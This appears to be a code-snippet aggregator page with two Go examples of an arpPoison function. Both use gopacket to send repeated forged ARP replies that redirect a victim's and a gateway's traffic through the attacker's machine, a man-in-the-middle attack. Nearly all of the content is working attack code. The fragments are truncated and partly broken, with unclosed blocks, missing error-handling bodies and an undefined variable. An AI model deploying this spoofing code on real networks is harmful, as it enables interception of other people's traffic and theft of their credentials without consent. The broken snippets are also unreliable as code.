Пример #1
    FUNCTION: arpPoison(targetMAC, gateway, gatewayMAC string){
    RETURNS: Nothing
                string targetMAC - the victim mac address for spoofing
								string gateway - the gateway IP the victim uses
								string gatewayMAC - the mac address of the gateway the vicitim uses

    Performs arp poisoning of the target machine. Sets its traffic to all come
		through the host machine, and sets the gateway to redirect its traffic for the victim to this host.
func arpPoison(targetMAC, gateway, gatewayMAC string) {

	// i lost my mind over this, the parseip function is broke and adds a bucket of worthless
	// bytes to the beginning of the array, I wish I did this in C
	gw := (net.ParseIP(gateway))[12:]
	tg := (net.ParseIP(target))[12:]
	tgm, _ := net.ParseMAC(targetMAC)
	gwm, _ := net.ParseMAC(gatewayMAC)

	fmt.Printf("GateWay IP:%s\nTarget IP:%s\nGateway MAC:%s\nTarget MAC:%s\n", gateway, target, gatewayMAC, targetMAC)

	ethernetPacket := layers.Ethernet{}
	ethernetPacket.DstMAC = tgm
	ethernetPacket.SrcMAC = macAddr
	ethernetPacket.EthernetType = layers.EthernetTypeARP

	arpPacket := layers.ARP{}
	arpPacket.AddrType = layers.LinkTypeEthernet
	arpPacket.Protocol = 0x0800
	arpPacket.HwAddressSize = 6
	arpPacket.ProtAddressSize = 4
	arpPacket.Operation = 2

	//poison the target
	arpPacket.SourceHwAddress = macAddr
	arpPacket.SourceProtAddress = gw
	arpPacket.DstHwAddress = tgm
	arpPacket.DstProtAddress = tg

	gwEthernetPacket := ethernetPacket
	gwARPPacket := arpPacket

	//poison the gateway
	gwARPPacket.SourceProtAddress = tg
	gwARPPacket.DstHwAddress = gwm
	gwARPPacket.DstProtAddress = gw

	for {
		//poison target
		writePoison(arpPacket, ethernetPacket)
		time.Sleep(1 * time.Second)
		//poison gateway
		writePoison(gwARPPacket, gwEthernetPacket)
		time.Sleep(5 * time.Second)

Пример #2
func arpPoison(device string, routerMac net.HardwareAddr, routerIP net.IP, localMac net.HardwareAddr, localIP net.IP, victimMac net.HardwareAddr, victimIP net.IP) {

	// Open NIC at layer 2
	handle, err := pcap.OpenLive(device, 1024, false, pcap.BlockForever)
	if err != nil {
	defer handle.Close()

	// create an empty ethernet packet
	ethernetPacket := layers.Ethernet{}
	// create an empty ARP packet
	arpPacket := layers.ARP{}
	// pre populate Arp Packet Info
	arpPacket.AddrType = layers.LinkTypeEthernet
	arpPacket.HwAddressSize = 6
	arpPacket.ProtAddressSize = 4
	arpPacket.Operation = 2
	arpPacket.Protocol = 0x0800

	// continiously put arp responses on the wire to ensure a good posion.
	for {
		/******** posion arp from victim to local ********/

		//set the ethernet packets' source mac address
		ethernetPacket.SrcMAC = localMac

		//set the ethernet packets' destination mac address
		ethernetPacket.DstMAC = victimMac

		//set the ethernet packets' type as ARP
		ethernetPacket.EthernetType = layers.EthernetTypeARP

		// create a buffer
		buf := gopacket.NewSerializeBuffer()
		opts := gopacket.SerializeOptions{}

		// customize ARP Packet info

		arpPacket.SourceHwAddress = localMac
		arpPacket.SourceProtAddress = routerIP
		arpPacket.DstHwAddress = victimMac
		arpPacket.DstProtAddress = victimIP

		// set options for serializing (this probably isn't needed for an ARP packet)

		// serialize the data (serialize PREPENDS the data)
		err = arpPacket.SerializeTo(buf, opts)
		if err != nil {

		err = ethernetPacket.SerializeTo(buf, opts)
		if err != nil {

		// turn the packet into a byte array
		packetData := buf.Bytes()

		//remove padding and write to the wire
		//Sleep so we don't flood with ARPS
		time.Sleep(50 * time.Millisecond)
		/******** end posion arp from victim to local ********/

		/******** posion arp from router to local ********/

		//set the ethernet packets' source mac address
		ethernetPacket.SrcMAC = localMac

		//set the ethernet packets' destination mac address
		ethernetPacket.DstMAC = victimMac

		//set the ethernet packets' type as ARP
		ethernetPacket.EthernetType = layers.EthernetTypeARP

		// customize ARP Packet info

		arpPacket.SourceHwAddress = localMac
		arpPacket.SourceProtAddress = victimIP
		arpPacket.DstHwAddress = routerMac
		arpPacket.DstProtAddress = routerIP

		// set options for serializing (this probably isn't needed for an ARP packet)

		// serialize the data (serialize PREPENDS the data)
		err = arpPacket.SerializeTo(buf, opts)
		if err != nil {

		err = ethernetPacket.SerializeTo(buf, opts)
		if err != nil {

		// turn the packet into a byte array
		packetData = buf.Bytes()

		//remove padding and write to the wire
		/******** end posion arp from router to local ********/

		//Sleep so we don't flood with ARPS
		time.Sleep(5 * time.Second)